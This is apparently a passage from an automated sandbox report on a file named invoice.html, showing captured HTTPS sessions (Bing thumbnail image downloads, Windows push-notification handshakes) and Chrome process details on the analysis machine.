                                                Data Ascii: (,dDW4!&$?w}'ok$>_<4~E}qQl-P>y<5vPOdVE\q:;{dO&I?ed!\ROWtnDVjw#Mdi%.'5!IEh.?wVt.I?3\K
                                                2024-12-16 10:25:11 UTC16069INData Raw: 54 b6 32 bc 5d 73 f6 7d 3f cb af 25 f1 04 fe 6c df f5 d2 bb af 1f de 7f 05 79 cd f3 6f 9a 47 ad 22 ec 44 89 74 3b 6f b4 5d ec ff 00 9e 95 ee df 0c f4 c8 ed ec fc f7 af 2e f8 73 a6 79 b7 7f bc af 6c fd de 99 e1 dd 9f f4 ce a6 5a b1 3f 84 e5 3e 25 6a bb 61 93 fe 79 c7 5f 38 f8 d3 50 7b bd 42 57 af 50 f8 c7 ab ec b3 95 13 fe 5a 57 88 ea b3 fe fb 7d 74 53 d8 ce a6 9a 15 66 92 b1 b5 46 ab f7 52 6c 86 b2 27 f9 e6 ad 0e 69 1b df 0e 6c 7c dd 42 3a f4 9d 61 f6 43 e4 57 2f f0 ca 0d bf 3d 74 37 5f be bb a8 93 d4 da 9a b2 24 b1 b6 8d 3e 7a c4 d4 a2 f3 75 cd 95 d1 da fc 96 95 42 0b 3f f8 9b 47 be a0 d1 a3 b9 f8 57 63 5e 93 ae 4b f6 7d 27 65 73 3f 0e 6c e3 8a 1a bf e3 cb cd 90 ec a4 9d cd ad 64 73 b3 cf be ee a7 b1 f9 e6 df 58 9e 7e f9 ab 62 c7 fe 3d 36 55 81 d0 f8 66
                                                Data Ascii: T2]s}?%lyoG"Dt;o].sylZ?>%jay_8P{BWPZW}tSfFRl'il|B:aCW/=t7_$>zuB?GWc^K}'es?ldsX~b=6Uf
                                                2024-12-16 10:25:11 UTC16384INData Raw: 3c df bb 86 df 67 da 7f 7b b3 e5 ad cd 36 c8 da 43 f6 29 34 7f df c9 73 fe b3 ee 3d 55 be d2 a7 b8 bb 8e 09 ec e6 92 78 ff 00 77 27 fc 06 87 35 70 51 69 0f ba f0 c7 da 34 fd f0 4d e5 c1 e6 7e ee 3f e3 a7 e9 7a 64 fa 7e ad 6c e9 e4 c9 1f fc f3 97 fb f5 b7 3d b7 d8 b4 9b 68 27 f3 a4 fb 47 ee fe cd 2f df f9 6a 94 70 49 14 d2 3c f0 f9 7f f2 cf cb a5 19 36 5b 8a e8 4d 3c 52 3d a7 d9 7f e5 a7 fc f5 ab 5f 61 8e 2b 4f 9f f7 90 7c 92 7e f7 fe 5a 55 5f 0c de 40 fe 62 79 3e 63 c7 52 79 b0 5c 79 8f e4 ff 00 e4 5f f3 d2 93 de c5 47 63 42 0b 98 ee 3e 7b 58 7f 79 24 9f bc a8 63 57 f3 ae 66 78 66 92 4d 3a 3f 32 3f ee 55 6d 0e 48 e5 d4 a3 7f df 49 fb d4 8f cb 8a ac f8 82 59 22 fb 4d ab cd fe b2 37 93 f7 5f f2 d1 3f 86 a1 bd 6c 56 ea e7 2d 7c df 68 9b cb f3 bf d6 49 ff 00
                                                Data Ascii: <g{6C)4s=Uxw'5pQi4M~?zd~l=h'G/jpI<6[M<R=_a+O|~ZU_@by>cRy\y_GcB>{Xy$cWfxfM:?2?UmHIY"M7_?lV-|hI
                                                2024-12-16 10:25:11 UTC16384INData Raw: 77 71 a5 ef fc 84 63 df 6f e5 f9 3f 27 cb ff 00 b3 1a c8 f0 75 f6 a5 75 a2 49 04 13 4d be df f7 91 f9 51 7c ff 00 ef 54 56 37 9a d5 be ad f6 db a9 a6 f3 e3 93 f7 b1 c9 f7 f7 d7 1f 24 9a 77 67 5c 6a 24 d1 db f8 bb 5a bf d0 b5 6b 69 f4 8b 3d 3f 64 9e 4c 92 47 14 5b de 37 5f e0 91 6b 2f c7 70 78 5e 5b 49 3f b1 34 dd 42 ca fa 4f de 7e f7 ee 79 bf c4 b5 6b c3 7a ae 93 a8 6a 17 29 75 f6 bb 7b af 31 3c bf 2b e7 fb 47 fd 33 6f f6 6b 4b c5 5e 1e 7b 78 7e c5 6b 79 f6 df 2e 4f f8 f2 fb 8f 23 b7 ff 00 13 5c ea a7 25 44 9b b1 d0 e2 ea 26 d6 a8 f3 48 d7 ca 87 c8 ba 87 f7 9f f3 d2 a1 92 da 7f f5 ef ff 00 5c e3 f2 ab d3 3c 65 a6 69 be 1f 9a 38 6d 66 b4 d6 bf d0 92 49 24 8a 2f 93 7c 9f ed 7f 1e da e3 67 97 ec 9a 4f d8 bc 9f 32 4f b4 f9 92 5c ff 00 cf 4a e8 a7 59 49 5d 1c
                                                Data Ascii: wqco?'uuIMQ|TV7$wg\j$Zki=?dLG[7_k/px^[I?4BO~ykzj)u{1<+G3okK^{x~ky.O#\%D&H\<ei8mfI$/|gO2O\JYI]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                9 | 192.168.2.6 | 49779 | 20.198.118.190 | 443
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:10 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305 MS-CV: ciBMwtWWxkCRx994.1 Context: 7ff13b2b8522b54b
                                                2024-12-16 10:25:10 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                2024-12-16 10:25:10 UTC | 1084 | OUT | Data Ascii: ATH 2 CON\DEVICE 1061 MS-CV: ciBMwtWWxkCRx994.2 Context: 7ff13b2b8522b54b <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                2024-12-16 10:25:10 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197 MS-CV: ciBMwtWWxkCRx994.3 Context: 7ff13b2b8522b54b <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                2024-12-16 10:25:11 UTC | 14 | IN | Data Ascii: 202 1 CON 58
                                                2024-12-16 10:25:11 UTC | 58 | IN | Data Ascii: MS-CV: PJhTlLhspkOAiz8yx8+yhA.0 Payload parsing failed.


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.6 | 49784 | 150.171.28.10 | 443
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:10 UTC | 375 | OUT | GET /th?id=OADD2.10239360312918_180TGJBF6DGGGWMR4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:11 UTC | 854 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 520026
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 4CAA5A95E77A4C02AE68FDE1292367AD Ref B: EWR30EDGE1416 Ref C: 2024-12-16T10:25:11Z
                                                Date: Mon, 16 Dec 2024 10:25:10 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                11 | 192.168.2.6 | 49785 | 150.171.28.10 | 443
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-12-16 10:25:10 UTC | 375 | OUT | GET /th?id=OADD2.10239357448969_167ANDP278VEQSWN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:11 UTC | 854 | IN | HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 513505
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: D186B697B51547C0A72A4A348F65646C Ref B: EWR30EDGE1610 Ref C: 2024-12-16T10:25:11Z
                                                Date: Mon, 16 Dec 2024 10:25:10 GMT
                                                Connection: close
                                                Data Ascii: ~vTUi$w$d"O-XR>QTy3{|q-#QIS}Q~W1Us~i.z6;+f7,=fw'IEMy)*Gwgz%4(>BHv`]ajwSX6-p.G6\U[YEBqVO*|VS
                                                2024-12-16 10:25:12 UTC16384INData Raw: 7f 1a 87 4c 59 db 56 9d 6e 25 59 23 54 5d bf dd 8c 93 cd 3b 08 96 e6 59 0c ca 4c 7c f4 5f e1 dd 8f 6a 6b 96 3b 8b cf e5 86 fb bf ed 7e 35 aa de 44 b0 c6 02 fe f5 54 9d ab f7 d8 76 22 b0 2d cc 90 eb 52 a5 e6 d6 12 36 6d a5 6f bb cf 50 73 d1 a9 a0 7a 16 5f cc 48 db ca 83 71 65 fb cd f2 ae 6a 3d 16 e2 79 a4 78 ae 55 56 46 62 3c b8 be 5d a3 dc f3 9c d4 b6 f2 10 b2 c6 8c ac 57 f8 7f 87 f1 a6 a4 f1 ac d8 96 26 8d f7 61 59 7e f5 51 24 d1 41 6d 24 2d 96 da 57 8f de 2f cc a4 f6 cd 42 d0 ca ab 82 ad 85 ff 00 6b d7 eb 52 22 05 dc e8 de 6c 4d cb 2a fd ec e7 ad 35 1e 74 dd 3a 7e f3 cc 5c 49 bb e6 56 c5 00 40 c2 58 9b 74 6c db bf da 50 d4 25 ec fd 4a c6 cd fe d7 cb 4e b9 60 8c cf 17 fa b6 51 f2 b7 f9 cd 3e 37 89 e3 8a 40 df 2c ad 8d df 7b 69 ef 9a 00 26 bb 90 b2 9f 9a
                                                Data Ascii: LYVn%Y#T];YL|_jk;~5DTv"-R6moPsz_Hqej=yxUVFb<]W&aY~Q$Am$-W/BkR"lM*5t:~\IV@XtlP%JN`Q>7@,{i&


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                12          192.168.2.6  49793        150.171.28.10   443
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-12-16 10:25:12 UTC  346                OUT        GET /th?id=OADD2.10239357448970_1TNLOVSCGCA1OJSDO&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:13 UTC  861                IN         HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 475456
                                                Content-Type: image/jpeg
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                X-Cache: CONFIG_NOCACHE
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: DACFBD791C404B69A0B7355D9B8D7800 Ref B: EWR30EDGE1408 Ref C: 2024-12-16T10:25:13Z
                                                Date: Mon, 16 Dec 2024 10:25:13 GMT
                                                Connection: close


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                13          192.168.2.6  49794        150.171.28.10   443
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-12-16 10:25:14 UTC  346                OUT        GET /th?id=OADD2.10239381687775_1ATJGWTGK72EI5PK1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:14 UTC  854                IN         HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 728621
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 982E43EDB7EC47739C0C6A5A26AC08FF Ref B: EWR30EDGE0821 Ref C: 2024-12-16T10:25:14Z
                                                Date: Mon, 16 Dec 2024 10:25:14 GMT
                                                Connection: close


                                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                14          192.168.2.6  49795        150.171.28.10   443
                                                Timestamp                Bytes transferred  Direction  Data
                                                2024-12-16 10:25:14 UTC  346                OUT        GET /th?id=OADD2.10239381687776_1QZR1YSB08WBPILZM&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate, br
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                Host: tse1.mm.bing.net
                                                Connection: Keep-Alive
                                                2024-12-16 10:25:14 UTC  856                IN         HTTP/1.1 200 OK
                                                Cache-Control: public, max-age=2592000
                                                Content-Length: 796768
                                                Content-Type: image/jpeg
                                                X-Cache: TCP_HIT
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: *
                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                Timing-Allow-Origin: *
                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                X-MSEdge-Ref: Ref A: 1C90E203FCD446B4851BB429E124041D Ref B: EWR311000104031 Ref C: 2024-12-16T10:25:14Z
                                                Date: Mon, 16 Dec 2024 10:25:14 GMT
                                                Connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                15 | 192.168.2.6 | 49848 | 20.198.118.190 | 443
                                                Timestamp | Bytes transferred | Direction | Data (ASCII)
                                                2024-12-16 10:25:33 UTC | 69 | OUT | CNT 1 CON 303 MS-CV: 89jPt693Rk+oH5z6.1 Context: b365a8f28eac21
                                                2024-12-16 10:25:33 UTC | 249 | OUT | <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                2024-12-16 10:25:33 UTC | 1082 | OUT | ATH 2 CON\DEVICE 1059 MS-CV: 89jPt693Rk+oH5z6.2 Context: b365a8f28eac21 <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLude
                                                2024-12-16 10:25:33 UTC | 216 | OUT | BND 3 CON\WNS 0 195 MS-CV: 89jPt693Rk+oH5z6.3 Context: b365a8f28eac21 <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                2024-12-16 10:25:33 UTC | 14 | IN | 202 1 CON 58
                                                2024-12-16 10:25:33 UTC | 58 | IN | MS-CV: ue8CiyP7dkmMMP9UX428yQ.0 Payload parsing failed.


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                16 | 192.168.2.6 | 49909 | 20.198.118.190 | 443
                                                Timestamp | Bytes transferred | Direction | Data (ASCII)
                                                2024-12-16 10:25:57 UTC | 71 | OUT | CNT 1 CON 305 MS-CV: 76SyODugBkqyHAT9.1 Context: 81e3c49ff5d42738
                                                2024-12-16 10:25:57 UTC | 249 | OUT | <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                2024-12-16 10:25:57 UTC | 1084 | OUT | ATH 2 CON\DEVICE 1061 MS-CV: 76SyODugBkqyHAT9.2 Context: 81e3c49ff5d42738 <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                2024-12-16 10:25:57 UTC | 218 | OUT | BND 3 CON\WNS 0 197 MS-CV: 76SyODugBkqyHAT9.3 Context: 81e3c49ff5d42738 <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                2024-12-16 10:25:58 UTC | 14 | IN | 202 1 CON 58
                                                2024-12-16 10:25:58 UTC | 58 | IN | MS-CV: Z/36f8ImWEWEeWjb/RswNg.0 Payload parsing failed.


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                17 | 192.168.2.6 | 49984 | 20.198.118.190 | 443
                                                Timestamp | Bytes transferred | Direction | Data (ASCII)
                                                2024-12-16 10:26:27 UTC | 71 | OUT | CNT 1 CON 305 MS-CV: g1/wzkRxMUm8Z7fk.1 Context: 267f0b7b8d8d242f
                                                2024-12-16 10:26:27 UTC | 249 | OUT | <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                2024-12-16 10:26:27 UTC | 1084 | OUT | ATH 2 CON\DEVICE 1061 MS-CV: g1/wzkRxMUm8Z7fk.2 Context: 267f0b7b8d8d242f <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                2024-12-16 10:26:27 UTC | 218 | OUT | BND 3 CON\WNS 0 197 MS-CV: g1/wzkRxMUm8Z7fk.3 Context: 267f0b7b8d8d242f <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                2024-12-16 10:26:28 UTC | 14 | IN | 202 1 CON 58
                                                2024-12-16 10:26:28 UTC | 58 | IN | MS-CV: cM8S66ZXT0i7JXGvmWVUwQ.0 Payload parsing failed.


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                18 | 192.168.2.6 | 50047 | 20.198.118.190 | 443
                                                Timestamp | Bytes transferred | Direction | Data (ASCII)
                                                2024-12-16 10:27:04 UTC | 71 | OUT | CNT 1 CON 305 MS-CV: 59aNbppeGEWyd8ns.1 Context: a0228cb82616179f
                                                2024-12-16 10:27:04 UTC | 249 | OUT | <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                2024-12-16 10:27:04 UTC | 1084 | OUT | ATH 2 CON\DEVICE 1061 MS-CV: 59aNbppeGEWyd8ns.2 Context: a0228cb82616179f <device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                2024-12-16 10:27:04 UTC | 218 | OUT | BND 3 CON\WNS 0 197 MS-CV: 59aNbppeGEWyd8ns.3 Context: a0228cb82616179f <wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                2024-12-16 10:27:05 UTC | 14 | IN | 202 1 CON 58
                                                2024-12-16 10:27:05 UTC | 58 | IN | MS-CV: 86YMK8AcRk25Dox1nbkyjA.0 Payload parsing failed.



                                                Target ID:1
                                                Start time:05:24:47
                                                Start date:16/12/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\invoice.html"
                                                Imagebase:0x7ff684c40000
                                                File size:3'242'272 bytes
                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:05:24:51
                                                Start date:16/12/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2240,i,13861710889327470393,8182189587716935906,262144 /prefetch:8
                                                Imagebase:0x7ff684c40000
                                                File size:3'242'272 bytes
                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                No disassembly